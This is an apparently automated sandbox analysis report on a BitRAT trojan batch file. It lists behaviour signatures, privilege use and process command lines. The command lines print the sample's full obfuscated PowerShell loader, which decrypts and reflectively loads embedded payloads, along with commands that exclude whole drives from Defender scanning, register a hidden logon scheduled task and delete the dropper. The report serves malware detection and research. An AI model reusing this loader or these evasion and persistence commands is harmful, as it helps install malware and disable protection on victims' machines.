Malware Analysis Report

2025-01-03 05:26

Sample ID 231012-bmt1wsfb3z
Target Stub_SC.bat
SHA256 c222b81571013219fd99f7ca5fefa350d6aabd28b03bbc819048a67570db274e
Tags bitrat trojan
Score 10/10

Analysis Overview

score
10/10

SHA256

c222b81571013219fd99f7ca5fefa350d6aabd28b03bbc819048a67570db274e

Threat Level: Known bad

The file Stub_SC.bat was found to be: Known bad.

Malicious Activity Summary

bitrat trojan

BitRAT

Checks computer location settings

Executes dropped EXE

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-12 01:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-12 01:16

Reported

2023-10-13 00:38

Platform

win7-20230831-en

Max time kernel

151s

Max time network

133s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat"

Signatures

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | N/A

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat

C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe

"C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe" -w hidden -c $apqR='LMJyQoaMJyQdMJyQ'.Replace('MJyQ', ''),'DecEzhXomEzhXprEzhXeEzhXsEzhXsEzhX'.Replace('EzhX', ''),'FHipDrHipDoHipDmHipDBasHipDe6HipD4SHipDtrHipDingHipD'.Replace('HipD', ''),'ReaGlTbdLiGlTbneGlTbsGlTb'.Replace('GlTb', ''),'CoHbpApHbpAyTHbpAoHbpA'.Replace('HbpA', ''),'MaEheginEhegMoEhegduEheglEhegeEheg'.Replace('Eheg', ''),'TroOznansoOznfooOznroOznmFoOzninaoOznloOznBloOznockoOzn'.Replace('oOzn', ''),'ChSshoanSshogeSshoESshoxSshotSshoeSshonsiSshooSshonSsho'.Replace('Ssho', ''),'EnnHrXtrynHrXPnHrXoinnHrXtnHrX'.Replace('nHrX', ''),'IndGVtvodGVtkedGVt'.Replace('dGVt', ''),'ElSdypemSdypeSdypntSdypAtSdyp'.Replace('Sdyp', ''),'SpuMPtliuMPttuMPt'.Replace('uMPt', ''),'GaSlAeaSlAtaSlACuaSlAraSlAreaSlAntaSlAPaSlAraSlAocaSlAesaSlAsaSlA'.Replace('aSlA', ''),'CrUNafeUNafatUNafeUNafDecUNafryUNafptUNafoUNafrUNaf'.Replace('UNaf', '');function pOCfZ($gekvJ){$BSBXA=[System.Security.Cryptography.Aes]::Create();$BSBXA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$BSBXA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$BSBXA.Key=[System.Convert]::($apqR[2])('zBdPf8AkDtINuDPE/A2HyG7nwgGIz2wO8zG9RRZ4V9A=');$BSBXA.IV=[System.Convert]::($apqR[2])('xa/+kPbivBu87Qs+xDhCVw==');$JTIYa=$BSBXA.($apqR[13])();$Yaopt=$JTIYa.($apqR[6])($gekvJ,0,$gekvJ.Length);$JTIYa.Dispose();$BSBXA.Dispose();$Yaopt;}function PqvPo($gekvJ){$Pbfvo=New-Object System.IO.MemoryStream(,$gekvJ);$ojhOO=New-Object System.IO.MemoryStream;$Oxkfy=New-Object System.IO.Compression.GZipStream($Pbfvo,[IO.Compression.CompressionMode]::($apqR[1]));$Oxkfy.($apqR[4])($ojhOO);$Oxkfy.Dispose();$Pbfvo.Dispose();$ojhOO.Dispose();$ojhOO.ToArray();}$atogv=[System.Linq.Enumerable]::($apqR[10])([System.IO.File]::($apqR[3])([System.IO.Path]::($apqR[7])([System.Diagnostics.Process]::($apqR[12])().($apqR[5]).FileName, $null)), 1);$MrHap=$atogv.Substring(2).($apqR[11])(':');$llRaa=PqvPo (pOCfZ ([Convert]::($apqR[2])($MrHap[0])));$VSAoW=PqvPo (pOCfZ 
([Convert]::($apqR[2])($MrHap[1])));[System.Reflection.Assembly]::($apqR[0])([byte[]]$VSAoW).($apqR[8]).($apqR[9])($null,$null);[System.Reflection.Assembly]::($apqR[0])([byte[]]$llRaa).($apqR[8]).($apqR[9])($null,$null);

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe

MD5 92f44e405db16ac55d97e3bfe3b132fa
SHA1 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA256 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512 f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-12 01:16

Reported

2023-10-13 00:37

Platform

win10v2004-20230915-en

Max time kernel

151s

Max time network

159s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat"

Signatures

BitRAT

trojan bitrat

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1104 wrote to memory of 1396 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1104 wrote to memory of 1396 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1396 wrote to memory of 3924 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe
PID 1396 wrote to memory of 3924 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe
PID 1396 wrote to memory of 3924 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe
PID 3924 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4224 | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4224 | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4224 | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4760 | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4760 | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4760 | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4996 | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4996 | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4996 | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4664 | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | C:\Windows\SysWOW64\cmd.exe
PID 3924 wrote to memory of 4664 | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | C:\Windows\SysWOW64\cmd.exe
PID 3924 wrote to memory of 4664 | N/A | C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe | C:\Windows\SysWOW64\cmd.exe
PID 4664 wrote to memory of 2324 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe
PID 4664 wrote to memory of 2324 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe
PID 4664 wrote to memory of 2324 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe
PID 2324 wrote to memory of 4112 | N/A | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4112 | N/A | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4112 | N/A | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 3984 | N/A | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 3984 | N/A | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 3984 | N/A | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 32 | N/A | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 32 | N/A | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 32 | N/A | C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat

C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe

"C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe" -w hidden -c $apqR='LMJyQoaMJyQdMJyQ'.Replace('MJyQ', ''),'DecEzhXomEzhXprEzhXeEzhXsEzhXsEzhX'.Replace('EzhX', ''),'FHipDrHipDoHipDmHipDBasHipDe6HipD4SHipDtrHipDingHipD'.Replace('HipD', ''),'ReaGlTbdLiGlTbneGlTbsGlTb'.Replace('GlTb', ''),'CoHbpApHbpAyTHbpAoHbpA'.Replace('HbpA', ''),'MaEheginEhegMoEhegduEheglEhegeEheg'.Replace('Eheg', ''),'TroOznansoOznfooOznroOznmFoOzninaoOznloOznBloOznockoOzn'.Replace('oOzn', ''),'ChSshoanSshogeSshoESshoxSshotSshoeSshonsiSshooSshonSsho'.Replace('Ssho', ''),'EnnHrXtrynHrXPnHrXoinnHrXtnHrX'.Replace('nHrX', ''),'IndGVtvodGVtkedGVt'.Replace('dGVt', ''),'ElSdypemSdypeSdypntSdypAtSdyp'.Replace('Sdyp', ''),'SpuMPtliuMPttuMPt'.Replace('uMPt', ''),'GaSlAeaSlAtaSlACuaSlAraSlAreaSlAntaSlAPaSlAraSlAocaSlAesaSlAsaSlA'.Replace('aSlA', ''),'CrUNafeUNafatUNafeUNafDecUNafryUNafptUNafoUNafrUNaf'.Replace('UNaf', '');function pOCfZ($gekvJ){$BSBXA=[System.Security.Cryptography.Aes]::Create();$BSBXA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$BSBXA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$BSBXA.Key=[System.Convert]::($apqR[2])('zBdPf8AkDtINuDPE/A2HyG7nwgGIz2wO8zG9RRZ4V9A=');$BSBXA.IV=[System.Convert]::($apqR[2])('xa/+kPbivBu87Qs+xDhCVw==');$JTIYa=$BSBXA.($apqR[13])();$Yaopt=$JTIYa.($apqR[6])($gekvJ,0,$gekvJ.Length);$JTIYa.Dispose();$BSBXA.Dispose();$Yaopt;}function PqvPo($gekvJ){$Pbfvo=New-Object System.IO.MemoryStream(,$gekvJ);$ojhOO=New-Object System.IO.MemoryStream;$Oxkfy=New-Object System.IO.Compression.GZipStream($Pbfvo,[IO.Compression.CompressionMode]::($apqR[1]));$Oxkfy.($apqR[4])($ojhOO);$Oxkfy.Dispose();$Pbfvo.Dispose();$ojhOO.Dispose();$ojhOO.ToArray();}$atogv=[System.Linq.Enumerable]::($apqR[10])([System.IO.File]::($apqR[3])([System.IO.Path]::($apqR[7])([System.Diagnostics.Process]::($apqR[12])().($apqR[5]).FileName, $null)), 1);$MrHap=$atogv.Substring(2).($apqR[11])(':');$llRaa=PqvPo (pOCfZ ([Convert]::($apqR[2])($MrHap[0])));$VSAoW=PqvPo (pOCfZ 
([Convert]::($apqR[2])($MrHap[1])));[System.Reflection.Assembly]::($apqR[0])([byte[]]$VSAoW).($apqR[8]).($apqR[9])($null,$null);[System.Reflection.Assembly]::($apqR[0])([byte[]]$llRaa).($apqR[8]).($apqR[9])($null,$null);

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3924);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\Stub_SC')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 42453' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network42453Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Network42453Man.cmd" "

C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe

"C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe" -w hidden -c $apqR='LMJyQoaMJyQdMJyQ'.Replace('MJyQ', ''),'DecEzhXomEzhXprEzhXeEzhXsEzhXsEzhX'.Replace('EzhX', ''),'FHipDrHipDoHipDmHipDBasHipDe6HipD4SHipDtrHipDingHipD'.Replace('HipD', ''),'ReaGlTbdLiGlTbneGlTbsGlTb'.Replace('GlTb', ''),'CoHbpApHbpAyTHbpAoHbpA'.Replace('HbpA', ''),'MaEheginEhegMoEhegduEheglEhegeEheg'.Replace('Eheg', ''),'TroOznansoOznfooOznroOznmFoOzninaoOznloOznBloOznockoOzn'.Replace('oOzn', ''),'ChSshoanSshogeSshoESshoxSshotSshoeSshonsiSshooSshonSsho'.Replace('Ssho', ''),'EnnHrXtrynHrXPnHrXoinnHrXtnHrX'.Replace('nHrX', ''),'IndGVtvodGVtkedGVt'.Replace('dGVt', ''),'ElSdypemSdypeSdypntSdypAtSdyp'.Replace('Sdyp', ''),'SpuMPtliuMPttuMPt'.Replace('uMPt', ''),'GaSlAeaSlAtaSlACuaSlAraSlAreaSlAntaSlAPaSlAraSlAocaSlAesaSlAsaSlA'.Replace('aSlA', ''),'CrUNafeUNafatUNafeUNafDecUNafryUNafptUNafoUNafrUNaf'.Replace('UNaf', '');function pOCfZ($gekvJ){$BSBXA=[System.Security.Cryptography.Aes]::Create();$BSBXA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$BSBXA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$BSBXA.Key=[System.Convert]::($apqR[2])('zBdPf8AkDtINuDPE/A2HyG7nwgGIz2wO8zG9RRZ4V9A=');$BSBXA.IV=[System.Convert]::($apqR[2])('xa/+kPbivBu87Qs+xDhCVw==');$JTIYa=$BSBXA.($apqR[13])();$Yaopt=$JTIYa.($apqR[6])($gekvJ,0,$gekvJ.Length);$JTIYa.Dispose();$BSBXA.Dispose();$Yaopt;}function PqvPo($gekvJ){$Pbfvo=New-Object System.IO.MemoryStream(,$gekvJ);$ojhOO=New-Object System.IO.MemoryStream;$Oxkfy=New-Object 